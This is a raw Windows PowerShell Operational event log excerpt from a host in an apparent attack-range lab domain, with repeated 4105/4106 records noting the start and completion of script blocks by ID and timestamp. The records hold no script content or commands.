SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477410
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477409
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477408
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477407
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477406
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477405
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477404
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477403
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477402
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477401
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477400
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477399
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477398
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477397
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477396
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477395
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477394
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477393
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477392
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477391
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477390
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477389
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477388
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477387
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477386
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477385
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477384
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477383
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477382
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477381
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477380
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477379
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477378
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477377
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477376
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477375
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477374
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477373
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477372
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477371
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477370
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477369
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477368
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477367
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477366
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477365
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477364
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477363
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477362
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477361
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477360
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477359
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477358
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477357
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477356
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477355
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
